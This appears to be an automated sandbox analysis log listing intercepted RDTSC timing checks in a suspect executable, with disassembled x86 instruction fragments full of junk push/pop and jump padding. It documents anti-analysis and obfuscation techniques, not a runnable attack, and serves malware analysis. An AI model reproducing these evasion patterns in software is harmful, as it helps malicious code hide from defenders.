Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0968 second address: 76F09F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C440h 0x00000009 adc ax, BB48h 0x0000000e jmp 00007F49E4E2C43Bh 0x00000013 popfd 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a lea eax, dword ptr [ebx+00000080h] 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F49E4E2C440h 0x00000027 and si, 7DA8h 0x0000002c jmp 00007F49E4E2C43Bh 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007F49E4E2C448h 0x00000038 xor ecx, 32BDF008h 0x0000003e jmp 00007F49E4E2C43Bh 0x00000043 popfd 0x00000044 popad 0x00000045 push 00000001h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F09F0 second address: 76F09F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F09F4 second address: 76F09F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F09F8 second address: 76F09FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F09FE second address: 76F0A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0A04 second address: 76F0A08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0A08 second address: 76F0A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F49E4E2C43Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0A1F second address: 76F0A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0A23 second address: 76F0A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0A29 second address: 76F0A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0A2F second address: 76F0A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0A33 second address: 76F0A7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F49E47F214Bh 0x00000011 nop 0x00000012 jmp 00007F49E47F2156h 0x00000017 lea eax, dword ptr [ebp-10h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0A7D second address: 76F0A81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0A81 second address: 76F0A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0AD6 second address: 76F0ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0ADA second address: 76F0AE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0AE0 second address: 76F0AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0AE6 second address: 76F0AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0AEA second address: 76F0AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0AFA second address: 76F0B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0B17 second address: 76F0B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, dx 0x00000011 pushfd 0x00000012 jmp 00007F49E4E2C43Fh 0x00000017 or esi, 6796934Eh 0x0000001d jmp 00007F49E4E2C449h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0B65 second address: 76F0BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov bh, D0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F4A53F30C9Ah 0x00000010 jmp 00007F49E47F2152h 0x00000015 mov eax, dword ptr [ebp-0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F49E47F214Dh 0x00000021 sbb si, 00E6h 0x00000026 jmp 00007F49E47F2151h 0x0000002b popfd 0x0000002c movzx esi, dx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0BB6 second address: 76F0C5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d mov eax, 4A7D335Dh 0x00000012 pushfd 0x00000013 jmp 00007F49E4E2C43Ah 0x00000018 xor cx, 87B8h 0x0000001d jmp 00007F49E4E2C43Bh 0x00000022 popfd 0x00000023 popad 0x00000024 lea eax, dword ptr [ebx+78h] 0x00000027 jmp 00007F49E4E2C446h 0x0000002c push 00000001h 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F49E4E2C43Eh 0x00000035 add ax, 6148h 0x0000003a jmp 00007F49E4E2C43Bh 0x0000003f popfd 0x00000040 call 00007F49E4E2C448h 0x00000045 mov dl, ah 0x00000047 pop edi 0x00000048 popad 0x00000049 nop 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F49E4E2C449h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0C5E second address: 76F0C6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0C6E second address: 76F0C72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0C72 second address: 76F0C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F49E47F214Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0C8A second address: 76F0CCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F49E4E2C43Eh 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F49E4E2C447h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0CCA second address: 76F0D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ecx, 2B9D3CB3h 0x00000010 mov ch, F1h 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov eax, 2DCFF307h 0x0000001a mov cx, B8A3h 0x0000001e popad 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F49E47F2150h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0D12 second address: 76F0D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0D5A second address: 76F0D77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0D77 second address: 76F0DB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007F49E4E2C43Eh 0x00000010 js 00007F4A5456AD53h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F49E4E2C43Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0DB0 second address: 76F0DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0DB4 second address: 76F0DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0DBA second address: 76F0E48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, D4h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp-04h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F49E47F214Bh 0x00000014 adc ah, FFFFFFAEh 0x00000017 jmp 00007F49E47F2159h 0x0000001c popfd 0x0000001d mov ax, DF37h 0x00000021 popad 0x00000022 mov dword ptr [esi+08h], eax 0x00000025 pushad 0x00000026 jmp 00007F49E47F2158h 0x0000002b jmp 00007F49E47F2152h 0x00000030 popad 0x00000031 lea eax, dword ptr [ebx+70h] 0x00000034 pushad 0x00000035 mov dx, ax 0x00000038 call 00007F49E47F214Ah 0x0000003d pushad 0x0000003e popad 0x0000003f pop esi 0x00000040 popad 0x00000041 push 00000001h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F49E47F214Ah 0x0000004a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0E48 second address: 76F0EFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C441h 0x00000009 sbb ax, 3856h 0x0000000e jmp 00007F49E4E2C441h 0x00000013 popfd 0x00000014 mov cx, 2DC7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c pushad 0x0000001d push eax 0x0000001e mov cl, bh 0x00000020 pop ecx 0x00000021 pushfd 0x00000022 jmp 00007F49E4E2C441h 0x00000027 sbb ax, DC66h 0x0000002c jmp 00007F49E4E2C441h 0x00000031 popfd 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 pushad 0x00000036 mov edx, 77E67EF0h 0x0000003b pushfd 0x0000003c jmp 00007F49E4E2C449h 0x00000041 xor esi, 44EBEC76h 0x00000047 jmp 00007F49E4E2C441h 0x0000004c popfd 0x0000004d popad 0x0000004e mov edx, esi 0x00000050 popad 0x00000051 nop 0x00000052 jmp 00007F49E4E2C43Ah 0x00000057 lea eax, dword ptr [ebp-18h] 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0EFD second address: 76F0F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0F01 second address: 76F0F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0F07 second address: 76F0F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49E47F2152h 0x00000008 mov ecx, 1199E8D1h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F49E47F214Ah 0x00000018 xor esi, 6A6FB328h 0x0000001e jmp 00007F49E47F214Bh 0x00000023 popfd 0x00000024 mov dx, si 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F49E47F2150h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0F5A second address: 76F0F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0F60 second address: 76F0F83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F49E47F214Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0F83 second address: 76F0F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E4E2C43Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F0FDA second address: 76F1043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F4A53F307FEh 0x0000000f jmp 00007F49E47F214Eh 0x00000014 mov eax, dword ptr [ebp-14h] 0x00000017 pushad 0x00000018 mov esi, 5196864Dh 0x0000001d call 00007F49E47F214Ah 0x00000022 mov edx, eax 0x00000024 pop esi 0x00000025 popad 0x00000026 mov ecx, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007F49E47F2156h 0x00000030 mov ecx, 358E3C61h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1043 second address: 76F10F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bh 0x00000005 movzx ecx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+0Ch], eax 0x0000000e pushad 0x0000000f mov bl, 53h 0x00000011 mov esi, 77E31C2Fh 0x00000016 popad 0x00000017 mov edx, 76EB06ECh 0x0000001c pushad 0x0000001d movzx esi, di 0x00000020 pushfd 0x00000021 jmp 00007F49E4E2C43Dh 0x00000026 sub esi, 65DE9B96h 0x0000002c jmp 00007F49E4E2C441h 0x00000031 popfd 0x00000032 popad 0x00000033 sub eax, eax 0x00000035 jmp 00007F49E4E2C447h 0x0000003a lock cmpxchg dword ptr [edx], ecx 0x0000003e jmp 00007F49E4E2C446h 0x00000043 pop edi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F49E4E2C43Dh 0x0000004d add eax, 28EB7906h 0x00000053 jmp 00007F49E4E2C441h 0x00000058 popfd 0x00000059 jmp 00007F49E4E2C440h 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F10F8 second address: 76F10FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F10FE second address: 76F1102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1102 second address: 76F1112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1112 second address: 76F1116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1116 second address: 76F111A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F111A second address: 76F1120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1120 second address: 76F113C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F2158h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F113C second address: 76F118C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F4A5456A9C5h 0x00000011 jmp 00007F49E4E2C446h 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 jmp 00007F49E4E2C440h 0x0000001e mov eax, dword ptr [esi] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ebx, 27AFB6E0h 0x00000028 mov edi, 2E09610Ch 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F118C second address: 76F11B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F49E47F214Ch 0x0000000b sbb al, 00000028h 0x0000000e jmp 00007F49E47F214Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [edx], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F11B8 second address: 76F11D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C447h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F11D3 second address: 76F1268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f popad 0x00000010 mov dword ptr [edx+04h], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F49E47F2150h 0x0000001a jmp 00007F49E47F2155h 0x0000001f popfd 0x00000020 pushad 0x00000021 mov esi, 2638128Dh 0x00000026 jmp 00007F49E47F214Ah 0x0000002b popad 0x0000002c popad 0x0000002d mov eax, dword ptr [esi+08h] 0x00000030 pushad 0x00000031 movzx ecx, bx 0x00000034 movsx ebx, si 0x00000037 popad 0x00000038 mov dword ptr [edx+08h], eax 0x0000003b jmp 00007F49E47F2152h 0x00000040 mov eax, dword ptr [esi+0Ch] 0x00000043 pushad 0x00000044 movzx esi, bx 0x00000047 mov eax, edx 0x00000049 popad 0x0000004a mov dword ptr [edx+0Ch], eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 push ecx 0x00000051 pop ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1268 second address: 76F126D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F126D second address: 76F1301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E47F214Fh 0x00000009 sbb esi, 37B7EDFEh 0x0000000f jmp 00007F49E47F2159h 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esi+10h] 0x0000001e pushad 0x0000001f mov ax, dx 0x00000022 mov dx, 94F8h 0x00000026 popad 0x00000027 mov dword ptr [edx+10h], eax 0x0000002a jmp 00007F49E47F2157h 0x0000002f mov eax, dword ptr [esi+14h] 0x00000032 jmp 00007F49E47F2156h 0x00000037 mov dword ptr [edx+14h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F49E47F2157h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1301 second address: 76F13AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C43Fh 0x00000009 adc si, 637Eh 0x0000000e jmp 00007F49E4E2C449h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+18h] 0x0000001a jmp 00007F49E4E2C43Ah 0x0000001f mov dword ptr [edx+18h], eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F49E4E2C43Eh 0x00000029 and ecx, 0C9915A8h 0x0000002f jmp 00007F49E4E2C43Bh 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007F49E4E2C448h 0x0000003b add esi, 4F308808h 0x00000041 jmp 00007F49E4E2C43Bh 0x00000046 popfd 0x00000047 popad 0x00000048 mov eax, dword ptr [esi+1Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F49E4E2C445h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F13AE second address: 76F1406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c jmp 00007F49E47F214Eh 0x00000011 mov eax, dword ptr [esi+20h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F49E47F214Dh 0x0000001d add esi, 6D252B36h 0x00000023 jmp 00007F49E47F2151h 0x00000028 popfd 0x00000029 mov eax, 5673EF27h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1406 second address: 76F1422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov esi, edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1422 second address: 76F1485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2152h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007F49E47F2150h 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 jmp 00007F49E47F2150h 0x00000019 mov eax, dword ptr [esi+28h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F49E47F214Eh 0x00000023 add ah, 00000048h 0x00000026 jmp 00007F49E47F214Bh 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e mov dx, ax 0x00000031 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1485 second address: 76F14CE instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F49E4E2C446h 0x00000013 pushfd 0x00000014 jmp 00007F49E4E2C442h 0x00000019 add cx, DB08h 0x0000001e jmp 00007F49E4E2C43Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F14CE second address: 76F154D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E47F214Fh 0x00000009 or ecx, 549FEB4Eh 0x0000000f jmp 00007F49E47F2159h 0x00000014 popfd 0x00000015 mov ecx, 3E938357h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ecx, dword ptr [esi+2Ch] 0x00000020 pushad 0x00000021 call 00007F49E47F2158h 0x00000026 pushad 0x00000027 popad 0x00000028 pop ecx 0x00000029 mov di, 8EA4h 0x0000002d popad 0x0000002e mov dword ptr [edx+2Ch], ecx 0x00000031 jmp 00007F49E47F2153h 0x00000036 mov ax, word ptr [esi+30h] 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov bh, C7h 0x0000003f popad 0x00000040 rdtsc
